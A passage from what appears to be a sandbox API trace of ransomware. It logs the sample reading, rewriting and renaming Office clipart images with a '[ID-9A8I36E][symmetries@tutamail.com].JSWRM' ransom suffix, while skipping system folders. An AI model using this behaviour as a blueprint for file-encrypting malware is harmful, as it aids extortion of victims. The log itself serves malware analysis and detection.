RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0090.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382952.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382952.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382952.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.003] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0090.003] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0090.003] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0090.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0090.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0090.003] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0090.003] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382952.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382952.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0090.004] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=96073) returned 1 [0090.004] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x17740) returned 0x24d210 [0090.005] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x17740, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x17740, lpOverlapped=0x0) returned 1 [0090.012] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.012] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x17740, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x17740, lpOverlapped=0x0) returned 1 [0090.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0090.014] CloseHandle (hObject=0x314) returned 1 [0090.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0090.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0090.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0090.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0090.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0090.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0090.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0090.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0090.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0090.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0090.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0090.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0090.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0090.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0090.014] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382952.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382952.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382952.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382952.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0090.015] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0090.015] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0090.015] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0090.015] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x110c9494, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x110c9494, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x110ef705, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x15a7f, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0382954.JPG", cAlternateFileName="")) returned 1 [0090.015] lstrcmpiW (lpString1="J0382954.JPG", lpString2=".") returned 1 [0090.015] lstrcmpiW (lpString1="J0382954.JPG", lpString2="..") returned 1 [0090.015] lstrcmpiW (lpString1="J0382954.JPG", lpString2="...") returned 1 [0090.015] lstrcmpiW (lpString1="J0382954.JPG", lpString2="windows") returned -1 [0090.015] lstrcmpiW (lpString1="J0382954.JPG", lpString2="recovery") returned -1 [0090.015] lstrcmpiW (lpString1="J0382954.JPG", lpString2="perflogs") returned -1 [0090.015] lstrcmpiW (lpString1="J0382954.JPG", lpString2="documents and settings") returned 1 [0090.015] lstrcmpiW (lpString1="J0382954.JPG", lpString2="$RECYCLE.BIN") returned 1 [0090.015] lstrcmpiW (lpString1="J0382954.JPG", lpString2="system volume information") returned -1 [0090.015] lstrcmpiW (lpString1="J0382954.JPG", lpString2="msocache") returned -1 [0090.015] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0090.016] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382954.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.016] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382954.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382954.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.016] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0090.016] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0090.016] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382954.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.016] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382954.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382954.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.016] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0090.016] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0090.016] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0090.016] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0090.016] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0090.016] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0090.016] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382954.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382954.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0090.085] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=88703) returned 1 [0090.086] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x15a70) returned 0x24d210 [0090.086] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x15a70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x15a70, lpOverlapped=0x0) returned 1 [0090.094] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.095] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x15a70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x15a70, lpOverlapped=0x0) returned 1 [0090.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0090.096] CloseHandle (hObject=0x314) returned 1 [0090.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0090.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0090.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0090.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0090.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0090.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0090.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0090.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0090.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0090.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0090.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0090.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0090.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0090.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0090.097] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382954.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382954.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382954.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382954.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0090.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0090.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0090.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0090.098] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf58455c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf58455c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf5aa7bb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x15fef, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0382955.JPG", cAlternateFileName="")) returned 1 [0090.098] lstrcmpiW (lpString1="J0382955.JPG", lpString2=".") returned 1 [0090.098] lstrcmpiW (lpString1="J0382955.JPG", lpString2="..") returned 1 [0090.098] lstrcmpiW (lpString1="J0382955.JPG", lpString2="...") returned 1 [0090.098] lstrcmpiW (lpString1="J0382955.JPG", lpString2="windows") returned -1 [0090.098] lstrcmpiW (lpString1="J0382955.JPG", lpString2="recovery") returned -1 [0090.098] lstrcmpiW (lpString1="J0382955.JPG", lpString2="perflogs") returned -1 [0090.098] lstrcmpiW (lpString1="J0382955.JPG", lpString2="documents and settings") returned 1 [0090.098] lstrcmpiW (lpString1="J0382955.JPG", lpString2="$RECYCLE.BIN") returned 1 [0090.098] lstrcmpiW (lpString1="J0382955.JPG", lpString2="system volume information") returned -1 [0090.098] lstrcmpiW (lpString1="J0382955.JPG", lpString2="msocache") returned -1 [0090.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0090.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382955.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382955.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382955.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0090.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0090.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382955.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382955.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382955.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0090.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0090.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0090.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0090.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0090.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0090.099] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382955.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382955.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0090.100] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=90095) returned 1 [0090.100] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x15fe0) returned 0x24d210 [0090.101] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x15fe0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x15fe0, lpOverlapped=0x0) returned 1 [0090.108] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.108] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x15fe0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x15fe0, lpOverlapped=0x0) returned 1 [0090.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0090.109] CloseHandle (hObject=0x314) returned 1 [0090.109] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0090.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0090.110] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0090.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0090.110] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0090.110] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0090.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0090.110] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0090.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0090.110] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0090.110] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0090.110] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0090.110] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0090.110] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0090.110] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382955.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382955.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382955.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382955.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0090.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0090.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0090.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0090.111] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf58455c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf58455c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf5aa7bb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1a9ed, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0382957.JPG", cAlternateFileName="")) returned 1 [0090.111] lstrcmpiW (lpString1="J0382957.JPG", lpString2=".") returned 1 [0090.111] lstrcmpiW (lpString1="J0382957.JPG", lpString2="..") returned 1 [0090.111] lstrcmpiW (lpString1="J0382957.JPG", lpString2="...") returned 1 [0090.111] lstrcmpiW (lpString1="J0382957.JPG", lpString2="windows") returned -1 [0090.111] lstrcmpiW (lpString1="J0382957.JPG", lpString2="recovery") returned -1 [0090.111] lstrcmpiW (lpString1="J0382957.JPG", lpString2="perflogs") returned -1 [0090.111] lstrcmpiW (lpString1="J0382957.JPG", lpString2="documents and settings") returned 1 [0090.111] lstrcmpiW (lpString1="J0382957.JPG", lpString2="$RECYCLE.BIN") returned 1 [0090.111] lstrcmpiW (lpString1="J0382957.JPG", lpString2="system volume information") returned -1 [0090.111] lstrcmpiW (lpString1="J0382957.JPG", lpString2="msocache") returned -1 [0090.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0090.111] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382957.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.111] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382957.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382957.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0090.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0090.111] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382957.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.111] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382957.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382957.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0090.112] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0090.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0090.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0090.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0090.112] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0090.112] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382957.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382957.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0090.113] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=109037) returned 1 [0090.113] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: 